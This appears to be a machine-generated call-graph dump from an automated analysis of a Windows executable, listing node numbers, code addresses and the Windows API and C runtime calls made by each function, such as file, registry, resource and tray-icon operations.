7b5ae7 96314 7b27ec 26 API calls pre_c_initialization 96259->96314 96264 7b5ba8 96270 7b5bbc 96264->96270 96271 7b5c02 WriteFile 96264->96271 96265 7b5b6f 96267 7b5b73 96265->96267 96268 7b5b95 96265->96268 96266 7b5b3b 96317 7b27ec 26 API calls pre_c_initialization 96266->96317 96272 7b5c69 96267->96272 96319 7b55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96267->96319 96320 7b542e 45 API calls 3 library calls 96268->96320 96275 7b5bf2 96270->96275 96276 7b5bc4 96270->96276 96274 7b5c25 GetLastError 96271->96274 96279 7b5b8b 96271->96279 96272->96284 96327 7af2d9 20 API calls __dosmaperr 96272->96327 96274->96279 96323 7b56c4 7 API calls 2 library calls 96275->96323 96280 7b5bc9 96276->96280 96281 7b5be2 96276->96281 96279->96272 96279->96284 96288 7b5c45 96279->96288 96280->96272 96286 7b5bd2 96280->96286 96322 7b5891 8 API calls 2 library calls 96281->96322 96283 7b5be0 96283->96279 96284->96248 96321 7b57a3 7 API calls 2 library calls 96286->96321 96287 7b5c8e 96328 7af2c6 20 API calls __dosmaperr 96287->96328 96291 7b5c4c 96288->96291 96292 7b5c60 96288->96292 96324 7af2d9 20 API calls __dosmaperr 96291->96324 96326 7af2a3 20 API calls __dosmaperr 96292->96326 96295 7b5c51 96325 7af2c6 20 API calls __dosmaperr 96295->96325 96297->96224 96298->96229 96299->96239 96300->96242 96301->96229 96302->96227 96303->96232 96304->96229 96306 7bf89b __fread_nolock 26 API calls 96305->96306 96307 7b565e 96306->96307 96308 7b5663 96307->96308 96329 7b2d74 38 API calls 3 library calls 96307->96329 96308->96264 96308->96265 96310 7b5686 96310->96308 96311 7b56a4 GetConsoleMode 96310->96311 96311->96308 96312->96253 96313->96259 96314->96284 96315->96257 96316->96266 96317->96284 96318->96255 96319->96279 96320->96279 96321->96283 96322->96283 96323->96283 96324->96295 96325->96284 96326->96284 96327->96287 96328->96284 96329->96310 96338 7b8585 96330->96338 96332 7b862b 96332->96214 96333->96207 96334->96214 96335->96208 96336->96213 96337->96214 96339 7b8591 ___BuildCatchObject 96338->96339 96349 7b5147 EnterCriticalSection 96339->96349 96341 7b859f 96342 7b85d1 96341->96342 96343 7b85c6 96341->96343 96365 7af2d9 20 API calls __dosmaperr 96342->96365 96350 7b86ae 96343->96350 96346 7b85cc 96366 7b85fb LeaveCriticalSection __wsopen_s 96346->96366 96348 7b85ee __wsopen_s 96348->96332 96349->96341 96367 7b53c4 96350->96367 96352 7b86c4 96380 7b5333 21 API calls 2 library calls 96352->96380 96354 7b86be 96354->96352 96355 7b53c4 __wsopen_s 26 API calls 96354->96355 96364 7b86f6 96354->96364 96360 7b86ed 96355->96360 96356 7b53c4 __wsopen_s 26 API calls 96357 7b8702 FindCloseChangeNotification 96356->96357 96357->96352 96361 7b870e GetLastError 96357->96361 96358 7b871c 96359 7b873e 96358->96359 96381 7af2a3 20 API calls __dosmaperr 96358->96381 96359->96346 96363 7b53c4 __wsopen_s 26 API calls 96360->96363 96361->96352 96363->96364 96364->96352 96364->96356 96365->96346 96366->96348 96368 7b53d1 96367->96368 96369 7b53e6 96367->96369 96382 7af2c6 20 API calls __dosmaperr 96368->96382 96373 7b540b 96369->96373 96384 7af2c6 20 API calls __dosmaperr 96369->96384 96372 7b53d6 96383 7af2d9 20 API calls __dosmaperr 96372->96383 96373->96354 96374 7b5416 96385 7af2d9 20 API calls __dosmaperr 96374->96385 96377 7b53de 96377->96354 96378 7b541e 96386 7b27ec 26 API calls pre_c_initialization 96378->96386 96380->96358 96381->96359 96382->96372 96383->96377 96384->96374 96385->96378 96386->96377 96575 784e90 LoadLibraryA 96387->96575 96392 7c3ccf 96394 784f39 68 API calls 96392->96394 96393 784ef6 LoadLibraryExW 96583 784e59 LoadLibraryA 96393->96583 96396 7c3cd6 96394->96396 96398 784e59 3 API calls 96396->96398 96400 7c3cde 96398->96400 96605 7850f5 96400->96605 96401 784f20 96401->96400 96402 784f2c 96401->96402 96404 784f39 68 API calls 96402->96404 96406 784f31 96404->96406 96406->95858 96406->95862 96408 7c3d05 96410 78a961 22 API calls 96409->96410 96411 785275 96410->96411 96412 78a961 22 API calls 96411->96412 96413 78527d 96412->96413 96414 78a961 22 API calls 96413->96414 96415 785285 96414->96415 96416 78a961 22 API calls 96415->96416 96417 78528d 96416->96417 96418 7c3df5 96417->96418 96419 7852c1 96417->96419 96420 78a8c7 22 API calls 96418->96420 96421 786d25 22 API calls 96419->96421 96422 7c3dfe 96420->96422 96423 7852cf 96421->96423 96424 78a6c3 22 API calls 96422->96424 96425 7893b2 22 API calls 96423->96425 96427 785304 96424->96427 96426 7852d9 96425->96426 96426->96427 96428 786d25 22 API calls 96426->96428 96430 785325 96427->96430 96443 785349 96427->96443 96450 7c3e20 96427->96450 96429 7852fa 96428->96429 96432 7893b2 22 API calls 96429->96432 96434 784c6d 22 API calls 96430->96434 96430->96443 96431 786d25 22 API calls 96433 78535a 96431->96433 96432->96427 96436 785370 96433->96436 96439 78a8c7 22 API calls 96433->96439 96437 785332 96434->96437 96435 785384 96440 78538f 96435->96440 96444 78a8c7 22 API calls 96435->96444 96436->96435 96441 78a8c7 22 API calls 96436->96441 96442 786d25 22 API calls 96437->96442 96437->96443 96438 786b57 22 API calls 96447 7c3ee0 96438->96447 96439->96436 96445 78a8c7 22 API calls 96440->96445 96448 78539a 96440->96448 96441->96435 96442->96443 96443->96431 96444->96440 96445->96448 96446 784c6d 22 API calls 96446->96447 96447->96443 96447->96446 96752 7849bd 22 API calls __fread_nolock 96447->96752 96448->95892 96450->96438 96452 78aec9 22 API calls 96451->96452 96453 784c78 96452->96453 96453->95896 96453->95897 96455 786362 96454->96455 96456 7c4a51 96454->96456 96753 786373 96455->96753 96763 784a88 22 API calls __fread_nolock 96456->96763 96459 78636e 96459->95905 96460 7c4a5b 96461 7c4a67 96460->96461 96462 78a8c7 22 API calls 96460->96462 96462->96461 96464 7ed7d8 96463->96464 96465 7ed7dd 96464->96465 96466 7ed7f3 96464->96466 96469 78a8c7 22 API calls 96465->96469 96516 7ed7ee 96465->96516 96467 78a961 22 API calls 96466->96467 96468 7ed7fb 96467->96468 96470 78a961 22 API calls 96468->96470 96469->96516 96471 7ed803 96470->96471 96472 78a961 22 API calls 96471->96472 96473 7ed80e 96472->96473 96474 78a961 22 API calls 96473->96474 96475 7ed816 96474->96475 96476 78a961 22 API calls 96475->96476 96477 7ed81e 96476->96477 96478 78a961 22 API calls 96477->96478 96479 7ed826 96478->96479 96480 78a961 22 API calls 96479->96480 96481 7ed82e 96480->96481 96482 78a961 22 API calls 96481->96482 96483 7ed836 96482->96483 96484 78525f 22 API calls 96483->96484 96485 7ed84d 96484->96485 96486 78525f 22 API calls 96485->96486 96487 7ed866 96486->96487 96488 784c6d 22 API calls 96487->96488 96489 7ed872 96488->96489 96490 7ed885 96489->96490 96491 7893b2 22 API calls 96489->96491 96492 784c6d 22 API calls 96490->96492 96491->96490 96493 7ed88e 96492->96493 96494 7ed89e 96493->96494 96495 7893b2 22 API calls 96493->96495 96496 7ed8b0 96494->96496 96498 78a8c7 22 API calls 96494->96498 96495->96494 96497 786350 22 API calls 96496->96497 96499 7ed8bb 96497->96499 96498->96496 96764 7ed978 22 API calls 96499->96764 96501 7ed8ca 96765 7ed978 22 API calls 96501->96765 96503 7ed8dd 96504 784c6d 22 API calls 96503->96504 96505 7ed8e7 96504->96505 96506 7ed8fe 96505->96506 96507 7ed8ec 96505->96507 96509 784c6d 22 API calls 96506->96509 96508 7833c6 22 API calls 96507->96508 96510 7ed8f9 96508->96510 96511 7ed907 96509->96511 96514 786350 22 API calls 96510->96514 96512 7ed925 96511->96512 96513 7833c6 22 API calls 96511->96513 96515 786350 22 API calls 96512->96515 96513->96510 96514->96512 96515->96516 96516->95913 96518 7f2954 __wsopen_s 96517->96518 96519 79fe0b 22 API calls 96518->96519 96520 7f2971 96519->96520 96521 785722 22 API calls 96520->96521 96522 7f297b 96521->96522 96523 7f274e 27 API calls 96522->96523 96524 7f2986 96523->96524 96525 78511f 64 API calls 96524->96525 96526 7f299b 96525->96526 96527 7f29bf 96526->96527 96528 7f2a6c 96526->96528 96779 7f2e66 96527->96779 96530 7f2e66 75 API calls 96528->96530 96545 7f2a38 96530->96545 96533 7850f5 40 API calls 96534 7f2a91 96533->96534 96535 7850f5 40 API calls 96534->96535 96537 7f2aa1 96535->96537 96536 7f29ed 96786 7ad583 26 API calls 96536->96786 96539 7850f5 40 API calls 96537->96539 96538 7f2a75 ISource 96538->95920 96541 7f2abc 96539->96541 96542 7850f5 40 API calls 96541->96542 96543 7f2acc 96542->96543 96544 7850f5 40 API calls 96543->96544 96546 7f2ae7 96544->96546 96545->96533 96545->96538 96547 7850f5 40 API calls 96546->96547 96548 7f2af7 96547->96548 96549 7850f5 40 API calls 96548->96549 96550 7f2b07 96549->96550 96551 7850f5 40 API calls 96550->96551 96552 7f2b17 96551->96552 96766 7f3017 GetTempPathW GetTempFileNameW 96552->96766 96554 7f2b22 96555 7ae5eb 29 API calls 96554->96555 96564 7f2b33 96555->96564 96556 7ae678 67 API calls 96557 7f2bf8 96556->96557 96559 7f2bfe DeleteFileW 96557->96559 96560 7f2c12 96557->96560 96558 7850f5 40 API calls 96558->96564 96559->96538 96561 7f2c91 CopyFileW 96560->96561 96567 7f2c18 96560->96567 96562 7f2cb9 DeleteFileW 96561->96562 96563 7f2ca7 DeleteFileW 96561->96563 96776 7f2fd8 CreateFileW 96562->96776 96563->96538 96564->96538 96564->96558 96568 7f2bed 96564->96568 96767 7adbb3 96564->96767 96787 7f22ce 96567->96787 96568->96556 96571 7f2c80 DeleteFileW 96571->96538 96572->95846 96573->95880 96574->95893 96576 784ea8 GetProcAddress 96575->96576 96577 784ec6 96575->96577 96578 784eb8 96576->96578 96580 7ae5eb 96577->96580 96578->96577 96579 784ebf FreeLibrary 96578->96579 96579->96577 96613 7ae52a 96580->96613 96582 784eea 96582->96392 96582->96393 96584 784e8d 96583->96584 96585 784e6e GetProcAddress 96583->96585 96588 784f80 96584->96588 96586 784e7e 96585->96586 96586->96584 96587 784e86 FreeLibrary 96586->96587 96587->96584 96589 79fe0b 22 API calls 96588->96589 96590 784f95 96589->96590 96591 785722 22 API calls 96590->96591 96592 784fa1 __fread_nolock 96591->96592 96593 7c3d1d 96592->96593 96594 7850a5 96592->96594 96604 784fdc 96592->96604 96676 7f304d 74 API calls 96593->96676 96665 7842a2 CreateStreamOnHGlobal 96594->96665 96597 7c3d22 96599 78511f 64 API calls 96597->96599 96598 7850f5 40 API calls 96598->96604 96600 7c3d45 96599->96600 96601 7850f5 40 API calls 96600->96601 96602 78506e ISource 96601->96602 96602->96401 96604->96597 96604->96598 96604->96602 96671 78511f 96604->96671 96606 785107 96605->96606 96609 7c3d70 96605->96609 96698 7ae8c4 96606->96698 96610 7f28fe 96735 7f274e 96610->96735 96612 7f2919 96612->96408 96616 7ae536 ___BuildCatchObject 96613->96616 96614 7ae544 96638 7af2d9 20 API calls __dosmaperr 96614->96638 96616->96614 96618 7ae574 96616->96618 96617 7ae549 96639 7b27ec 26 API calls pre_c_initialization 96617->96639 96620 7ae579 96618->96620 96621 7ae586 96618->96621 96640 7af2d9 20 API calls __dosmaperr 96620->96640 96630 7b8061 96621->96630 96624 7ae554 __wsopen_s 96624->96582 96625 7ae58f 96626 7ae595 96625->96626 96628 7ae5a2 96625->96628 96641 7af2d9 20 API calls __dosmaperr 96626->96641 96642 7ae5d4 LeaveCriticalSection __fread_nolock 96628->96642 96631 7b806d ___BuildCatchObject 96630->96631 96643 7b2f5e EnterCriticalSection 96631->96643 96633 7b807b 96644 7b80fb 96633->96644 96637 7b80ac __wsopen_s 96637->96625 96638->96617 96639->96624 96640->96624 96641->96624 96642->96624 96643->96633 96645 7b811e 96644->96645 96646 7b8177 96645->96646 96653 7b8088 96645->96653 96660 7a918d EnterCriticalSection 96645->96660 96661 7a91a1 LeaveCriticalSection 96645->96661 96647 7b4c7d __dosmaperr 20 API calls 96646->96647 96649 7b8180 96647->96649 96650 7b29c8 _free 20 API calls 96649->96650 96651 7b8189 96650->96651 96651->96653 96662 7b3405 11 API calls 2 library calls 96651->96662 96657 7b80b7 96653->96657 96654 7b81a8 96663 7a918d EnterCriticalSection 96654->96663 96664 7b2fa6 LeaveCriticalSection 96657->96664 96659 7b80be 96659->96637 96660->96645 96661->96645 96662->96654 96663->96653 96664->96659 96666 7842d9 96665->96666 96667 7842bc FindResourceExW 96665->96667 96666->96604 96667->96666 96668 7c35ba LoadResource 96667->96668 96668->96666 96669 7c35cf SizeofResource 96668->96669 96669->96666 96670 7c35e3 LockResource 96669->96670 96670->96666 96672 78512e 96671->96672 96673 7c3d90 96671->96673 96677 7aece3 96672->96677 96676->96597 96680 7aeaaa 96677->96680 96679 78513c 96679->96604 96681 7aeab6 ___BuildCatchObject 96680->96681 96682 7aeac2 96681->96682 96684 7aeae8 96681->96684 96693 7af2d9 20 API calls __dosmaperr 96682->96693 96695 7a918d EnterCriticalSection 96684->96695 96685 7aeac7 96694 7b27ec 26 API calls pre_c_initialization 96685->96694 96687 7aeaf4 96696 7aec0a 62 API calls 2 library calls 96687->96696 96690 7aeb08 96697 7aeb27 LeaveCriticalSection __fread_nolock 96690->96697 96692 7aead2 __wsopen_s 96692->96679 96693->96685 96694->96692 96695->96687 96696->96690 96697->96692 96701 7ae8e1 96698->96701 96700 785118 96700->96610 96702 7ae8ed ___BuildCatchObject 96701->96702 96703 7ae92d 96702->96703 96704 7ae900 ___scrt_fastfail 96702->96704 96713 7ae925 __wsopen_s 96702->96713 96714 7a918d EnterCriticalSection 96703->96714 96728 7af2d9 20 API calls __dosmaperr 96704->96728 96706 7ae937 96715 7ae6f8 96706->96715 96709 7ae91a 96729 7b27ec 26 API calls pre_c_initialization 96709->96729 96713->96700 96714->96706 96716 7ae727 96715->96716 96719 7ae70a ___scrt_fastfail 96715->96719 96730 7ae96c LeaveCriticalSection __fread_nolock 96716->96730 96717 7ae717 96731 7af2d9 20 API calls __dosmaperr 96717->96731 96719->96716 96719->96717 96721 7ae76a __fread_nolock 96719->96721 96721->96716 96723 7ad955 __fread_nolock 26 API calls 96721->96723 96724 7ae886 ___scrt_fastfail 96721->96724 96727 7b8d45 __fread_nolock 38 API calls 96721->96727 96733 7acf78 26 API calls 4 library calls 96721->96733 96723->96721 96734 7af2d9 20 API calls __dosmaperr 96724->96734 96726 7ae71c 96732 7b27ec 26 API calls pre_c_initialization 96726->96732 96727->96721 96728->96709 96729->96713 96730->96713 96731->96726 96732->96716 96733->96721 96734->96726 96738 7ae4e8 96735->96738 96737 7f275d 96737->96612 96741 7ae469 96738->96741 96740 7ae505 96740->96737 96742 7ae478 96741->96742 96743 7ae48c 96741->96743 96749 7af2d9 20 API calls __dosmaperr 96742->96749 96748 7ae488 __alldvrm 96743->96748 96751 7b333f 11 API calls 2 library calls 96743->96751 96745 7ae47d 96750 7b27ec 26 API calls pre_c_initialization 96745->96750 96748->96740 96749->96745 96750->96748 96751->96748 96752->96447 96754 7863b6 __fread_nolock 96753->96754 96755 786382 96753->96755 96754->96459 96755->96754 96756 7c4a82 96755->96756 96757 7863a9 96755->96757 96759 79fddb 22 API calls 96756->96759 96758 78a587 22 API calls 96757->96758 96758->96754 96760 7c4a91 96759->96760 96761 79fe0b 22 API calls 96760->96761 96762 7c4ac5 __fread_nolock 96761->96762 96763->96460 96764->96501 96765->96503 96766->96554 96768 7adbc1 96767->96768 96774 7adbdd 96767->96774 96769 7adbcd 96768->96769 96770 7adbe3 96768->96770 96768->96774 96819 7af2d9 20 API calls __dosmaperr 96769->96819 96816 7ad9cc 96770->96816 96773 7adbd2 96820 7b27ec 26 API calls pre_c_initialization 96773->96820 96774->96564 96777 7f2fff SetFileTime CloseHandle 96776->96777 96778 7f3013 96776->96778 96777->96778 96778->96538 96784 7f2e7a 96779->96784 96780 7850f5 40 API calls 96780->96784 96781 7f29c4 96781->96538 96785 7ad583 26 API calls 96781->96785 96782 7f28fe 27 API calls 96782->96784 96783 78511f 64 API calls 96783->96784 96784->96780 96784->96781 96784->96782 96784->96783 96785->96536 96786->96545 96788 7f22d9 96787->96788 96789 7f22e7 96787->96789 96790 7ae5eb 29 API calls 96788->96790 96791 7f232c 96789->96791 96792 7ae5eb 29 API calls 96789->96792 96811 7f22f0 96789->96811 96790->96789 96862 7f2557 96791->96862 96794 7f2311 96792->96794 96794->96791 96795 7f231a 96794->96795 96799 7ae678 67 API calls 96795->96799 96795->96811 96796 7f2370 96797 7f2395 96796->96797 96798 7f2374 96796->96798 96866 7f2171 96797->96866 96801 7f2381 96798->96801 96803 7ae678 67 API calls 96798->96803 96799->96811 96806 7ae678 67 API calls 96801->96806 96801->96811 96803->96801 96806->96811 96811->96562 96811->96571 96821 7ad97b 96816->96821 96819->96773 96820->96774 96822 7ad987 ___BuildCatchObject 96821->96822 96829 7a918d EnterCriticalSection 96822->96829 96824 7ad995 96830 7ad9f4 96824->96830 96829->96824 96838 7b49a1 96830->96838 96839 7ad955 __fread_nolock 26 API calls 96838->96839 96840 7b49b0 96839->96840 96841 7bf89b __fread_nolock 26 API calls 96840->96841 96842 7b49b6 96841->96842 96846 7ada09 96842->96846 96859 7b3820 21 API calls __dosmaperr 96842->96859 96844 7b4a15 96845 7b29c8 _free 20 API calls 96844->96845 96845->96846 96847 7ada3a 96846->96847 96850 7ada4c 96847->96850 96853 7ada24 96847->96853 96848 7ada5a 96850->96848 96850->96853 96854 7ada85 __fread_nolock 96850->96854 96854->96853 96859->96844 96863 7f257c 96862->96863 96865 7f2565 __fread_nolock 96862->96865 96864 7ae8c4 __fread_nolock 40 API calls 96863->96864 96864->96865 96865->96796 96867 7aea0c ___std_exception_copy 21 API calls 96866->96867 96868 7f217f 96867->96868 96869 7aea0c ___std_exception_copy 21 API calls 96868->96869 96870 7f2190 96869->96870 96894 7d3f75 96905 79ceb1 96894->96905 96896 7d3f8b 96897 7d4006 96896->96897 96972 79e300 23 API calls 96896->96972 96914 78bf40 96897->96914 96901 7d3fe6 96902 7d4052 96901->96902 96973 7f1abf 22 API calls 96901->96973 96903 7d4a88 96902->96903 96974 7f359c 82 API calls __wsopen_s 96902->96974 96906 79cebf 96905->96906 96907 79ced2 96905->96907 96975 78aceb 23 API calls ISource 96906->96975 96909 79cf05 96907->96909 96910 79ced7 96907->96910 96976 78aceb 23 API calls ISource 96909->96976 96911 79fddb 22 API calls 96910->96911 96913 79cec9 96911->96913 96913->96896 96977 78adf0 96914->96977 96916 78bf9d 96917 78bfa9 96916->96917 96918 7d04b6 96916->96918 96920 7d04c6 96917->96920 96921 78c01e 96917->96921 96996 7f359c 82 API calls __wsopen_s 96918->96996 96997 7f359c 82 API calls __wsopen_s 96920->96997 96982 78ac91 96921->96982 96924 78c7da 96929 79fe0b 22 API calls 96924->96929 96928 79fddb 22 API calls 96940 78c039 ISource __fread_nolock 96928->96940 96935 78c808 __fread_nolock 96929->96935 96932 7d04f5 96934 7d055a 96932->96934 96998 79d217 235 API calls 96932->96998 96958 78c603 96934->96958 96999 7f359c 82 API calls __wsopen_s 96934->96999 96938 79fe0b 22 API calls 96935->96938 96936 7e7120 22 API calls 96936->96940 96937 7d091a 97009 7f3209 23 API calls 96937->97009 96969 78c350 ISource __fread_nolock 96938->96969 96939 78af8a 22 API calls 96939->96940 96940->96924 96940->96928 96940->96932 96940->96934 96940->96935 96940->96936 96940->96937 96940->96939 96943 78ec40 235 API calls 96940->96943 96944 7d08a5 96940->96944 96948 7d0591 96940->96948 96949 7d08f6 96940->96949 96956 78c237 96940->96956 96940->96958 96964 7d09bf 96940->96964 96966 78bbe0 40 API calls 96940->96966 96970 79fe0b 22 API calls 96940->96970 96986 78ad81 96940->96986 97001 7e7099 22 API calls __fread_nolock 96940->97001 97002 805745 54 API calls _wcslen 96940->97002 97003 79aa42 22 API calls ISource 96940->97003 97004 7ef05c 40 API calls 96940->97004 97005 78a993 41 API calls 96940->97005 97006 78aceb 23 API calls ISource 96940->97006 96943->96940 96945 78ec40 235 API calls 96944->96945 96947 7d08cf 96945->96947 96947->96958 97007 78a81b 41 API calls 96947->97007 97000 7f359c 82 API calls __wsopen_s 96948->97000 97008 7f359c 82 API calls __wsopen_s 96949->97008 96955 78c253 96959 7d0976 96955->96959 96962 78c297 ISource 96955->96962 96956->96955 96957 78a8c7 22 API calls 96956->96957 96957->96955 96958->96902 97010 78aceb 23 API calls ISource 96959->97010 96962->96964 96993 78aceb 23 API calls ISource 96962->96993 96964->96958 97011 7f359c 82 API calls __wsopen_s 96964->97011 96965 78c335 96965->96964 96967 78c342 96965->96967 96966->96940 96994 78a704 22 API calls ISource 96967->96994 96971 78c3ac 96969->96971 96995 79ce17 22 API calls ISource 96969->96995 96970->96940 96971->96902 96972->96901 96973->96897 96974->96903 96975->96913 96976->96913 96978 78ae01 96977->96978 96981 78ae1c ISource 96977->96981 96979 78aec9 22 API calls 96978->96979 96980 78ae09 CharUpperBuffW 96979->96980 96980->96981 96981->96916 96983 78acae 96982->96983 96985 78acd1 96983->96985 97012 7f359c 82 API calls __wsopen_s 96983->97012 96985->96940 96987 7cfadb 96986->96987 96988 78ad92 96986->96988 96989 79fddb 22 API calls 96988->96989 96990 78ad99 96989->96990 97013 78adcd 96990->97013 96993->96965 96994->96969 96995->96969 96996->96920 96997->96958 96998->96934 96999->96958 97000->96958 97001->96940 97002->96940 97003->96940 97004->96940 97005->96940 97006->96940 97007->96949 97008->96958 97009->96956 97010->96964 97011->96958 97012->96985 97017 78addd 97013->97017 97014 78adb6 97014->96940 97015 79fddb 22 API calls 97015->97017 97016 78a961 22 API calls 97016->97017 97017->97014 97017->97015 97017->97016 97018 78a8c7 22 API calls 97017->97018 97019 78adcd 22 API calls 97017->97019 97018->97017 97019->97017 97020 78df10 97021 78b710 235 API calls 97020->97021 97022 78df1e 97021->97022 97023 781033 97028 784c91 97023->97028 97027 781042 97029 78a961 22 API calls 97028->97029 97030 784cff 97029->97030 97036 783af0 97030->97036 97033 784d9c 97034 781038 97033->97034 97039 7851f7 22 API calls __fread_nolock 97033->97039 97035 7a00a3 29 API calls __onexit 97034->97035 97035->97027 97040 783b1c 97036->97040 97039->97033 97041 783b0f 97040->97041 97042 783b29 97040->97042 97041->97033 97042->97041 97043 783b30 RegOpenKeyExW 97042->97043 97043->97041 97044 783b4a RegQueryValueExW 97043->97044 97045 783b80 RegCloseKey 97044->97045 97046 783b6b 97044->97046 97045->97041 97046->97045 97047 783156 97050 783170 97047->97050 97051 783187 97050->97051 97052 7831eb 97051->97052 97053 78318c 97051->97053 97091 7831e9 97051->97091 97057 7c2dfb 97052->97057 97058 7831f1 97052->97058 97054 783199 97053->97054 97055 783265 PostQuitMessage 97053->97055 97060 7c2e7c 97054->97060 97061 7831a4 97054->97061 97079 78316a 97055->97079 97056 7831d0 DefWindowProcW 97056->97079 97106 7818e2 10 API calls 97057->97106 97062 7831f8 97058->97062 97063 78321d SetTimer RegisterWindowMessageW 97058->97063 97120 7ebf30 34 API calls ___scrt_fastfail 97060->97120 97065 7c2e68 97061->97065 97066 7831ae 97061->97066 97069 7c2d9c 97062->97069 97070 783201 KillTimer 97062->97070 97067 783246 CreatePopupMenu 97063->97067 97063->97079 97064 7c2e1c 97107 79e499 42 API calls 97064->97107 97095 7ec161 97065->97095 97073 7c2e4d 97066->97073 97074 7831b9 97066->97074 97067->97079 97076 7c2dd7 MoveWindow 97069->97076 97077 7c2da1 97069->97077 97102 7830f2 Shell_NotifyIconW ___scrt_fastfail 97070->97102 97073->97056 97119 7e0ad7 22 API calls 97073->97119 97080 7831c4 97074->97080 97081 783253 97074->97081 97075 7c2e8e 97075->97056 97075->97079 97076->97079 97082 7c2dc6 SetFocus 97077->97082 97083 7c2da7 97077->97083 97080->97056 97108 7830f2 Shell_NotifyIconW ___scrt_fastfail 97080->97108 97104 78326f 44 API calls ___scrt_fastfail 97081->97104 97082->97079 97083->97080 97086 7c2db0 97083->97086 97084 783214 97103 783c50 DeleteObject DestroyWindow 97084->97103 97105 7818e2 10 API calls 97086->97105 97089 783263 97089->97079 97091->97056 97093 7c2e41 97109 783837 97093->97109 97096 7ec179 ___scrt_fastfail 97095->97096 97097 7ec276 97095->97097 97121 783923 97096->97121 97097->97079 97099 7ec25f KillTimer SetTimer 97099->97097 97100 7ec1a0 97100->97099 97101 7ec251 Shell_NotifyIconW 97100->97101 97101->97099 97102->97084 97103->97079 97104->97089 97105->97079 97106->97064 97107->97080 97108->97093 97110 783862 ___scrt_fastfail 97109->97110 97143 784212 97110->97143 97113 7838e8 97115 7c3386 Shell_NotifyIconW 97113->97115 97116 783906 Shell_NotifyIconW 97113->97116 97117 783923 24 API calls 97116->97117 97118 78391c 97117->97118 97118->97091 97119->97091 97120->97075 97122 78393f 97121->97122 97141 783a13 97121->97141 97123 786270 22 API calls 97122->97123 97124 78394d 97123->97124 97125 78395a 97124->97125 97126 7c3393 LoadStringW 97124->97126 97127 786b57 22 API calls 97125->97127 97128 7c33ad 97126->97128 97129 78396f 97127->97129 97134 78a8c7 22 API calls 97128->97134 97136 783994 ___scrt_fastfail 97128->97136 97130 78397c 97129->97130 97131 7c33c9 97129->97131 97130->97128 97132 783986 97130->97132 97133 786350 22 API calls 97131->97133 97135 786350 22 API calls 97132->97135 97137 7c33d7 97133->97137 97134->97136 97135->97136 97139 7839f9 Shell_NotifyIconW 97136->97139 97137->97136 97138 7833c6 22 API calls 97137->97138 97140 7c33f9 97138->97140 97139->97141 97142 7833c6 22 API calls 97140->97142 97141->97100 97142->97136 97144 7c35a4 97143->97144 97145 7838b7 97143->97145 97144->97145 97146 7c35ad DestroyIcon 97144->97146 97145->97113 97147 7ec874 42 API calls _strftime 97145->97147 97146->97145 97147->97113 97148 782e37 97149 78a961 22 API calls 97148->97149 97150 782e4d 97149->97150 97227 784ae3 97150->97227 97152 782e6b 97153 783a5a 24 API calls 97152->97153 97154 782e7f 97153->97154 97155 789cb3 22 API calls 97154->97155 97156 782e8c 97155->97156 97157 784ecb 94 API calls 97156->97157 97158 782ea5 97157->97158 97159 782ead 97158->97159 97160 7c2cb0 97158->97160 97164 78a8c7 22 API calls 97159->97164 97255 7f2cf9 97160->97255 97162 7c2cc3 97163 7c2ccf 97162->97163 97165 784f39 68 API calls 97162->97165 97169 784f39 68 API calls 97163->97169 97166 782ec3 97164->97166 97165->97163 97241 786f88 22 API calls 97166->97241 97168 782ecf 97170 789cb3 22 API calls 97168->97170 97171 7c2ce5 97169->97171 97172 782edc 97170->97172 97281 783084 22 API calls 97171->97281 97242 78a81b 41 API calls 97172->97242 97174 782eec 97177 789cb3 22 API calls 97174->97177 97176 7c2d02 97282 783084 22 API calls 97176->97282 97179 782f12 97177->97179 97243 78a81b 41 API calls 97179->97243 97180 7c2d1e 97182 783a5a 24 API calls 97180->97182 97183 7c2d44 97182->97183 97283 783084 22 API calls 97183->97283 97184 782f21 97187 78a961 22 API calls 97184->97187 97186 7c2d50 97189 78a8c7 22 API calls 97186->97189 97188 782f3f 97187->97188 97244 783084 22 API calls 97188->97244 97191 7c2d5e 97189->97191 97284 783084 22 API calls 97191->97284 97192 782f4b 97245 7a4a28 40 API calls 3 library calls 97192->97245 97195 7c2d6d 97198 78a8c7 22 API calls 97195->97198 97196 782f59 97196->97171 97197 782f63 97196->97197 97246 7a4a28 40 API calls 3 library calls 97197->97246 97200 7c2d83 97198->97200 97285 783084 22 API calls 97200->97285 97201 782f6e 97201->97176 97203 782f78 97201->97203 97247 7a4a28 40 API calls 3 library calls 97203->97247 97204 7c2d90 97206 782f83 97206->97180 97207 782f8d 97206->97207 97248 7a4a28 40 API calls 3 library calls 97207->97248 97209 782f98 97210 782fdc 97209->97210 97249 783084 22 API calls 97209->97249 97210->97195 97211 782fe8 97210->97211 97211->97204 97214 7863eb 22 API calls 97211->97214 97213 782fbf 97215 78a8c7 22 API calls 97213->97215 97216 782ff8 97214->97216 97217 782fcd 97215->97217 97218 786a50 22 API calls 97216->97218 97250 783084 22 API calls 97217->97250 97220 783006 97218->97220 97251 7870b0 23 API calls 97220->97251 97224 783021 97225 783065 97224->97225 97252 786f88 22 API calls 97224->97252 97253 7870b0 23 API calls 97224->97253 97254 783084 22 API calls 97224->97254 97228 784af0 __wsopen_s 97227->97228 97229 786b57 22 API calls 97228->97229 97230 784b22 97228->97230 97229->97230 97231 784c6d 22 API calls 97230->97231 97240 784b58 97230->97240 97231->97230 97232 789cb3 22 API calls 97234 784c52 97232->97234 97233 789cb3 22 API calls 97233->97240 97235 78515f 22 API calls 97234->97235 97238 784c5e 97235->97238 97236 784c6d 22 API calls 97236->97240 97237 78515f 22 API calls 97237->97240 97238->97152 97239 784c29 97239->97232 97239->97238 97240->97233 97240->97236 97240->97237 97240->97239 97241->97168 97242->97174 97243->97184 97244->97192 97245->97196 97246->97201 97247->97206 97248->97209 97249->97213 97250->97210 97251->97224 97252->97224 97253->97224 97254->97224 97256 7f2d15 97255->97256 97257 78511f 64 API calls 97256->97257 97258 7f2d29 97257->97258 97259 7f2e66 75 API calls 97258->97259 97260 7f2d3b 97259->97260 97261 7850f5 40 API calls 97260->97261 97278 7f2d3f 97260->97278 97262 7f2d56 97261->97262 97263 7850f5 40 API calls 97262->97263 97264 7f2d66 97263->97264 97265 7850f5 40 API calls 97264->97265 97266 7f2d81 97265->97266 97267 7850f5 40 API calls 97266->97267 97268 7f2d9c 97267->97268 97269 78511f 64 API calls 97268->97269 97270 7f2db3 97269->97270 97271 7aea0c ___std_exception_copy 21 API calls 97270->97271 97272 7f2dba 97271->97272 97273 7aea0c ___std_exception_copy 21 API calls 97272->97273 97274 7f2dc4 97273->97274 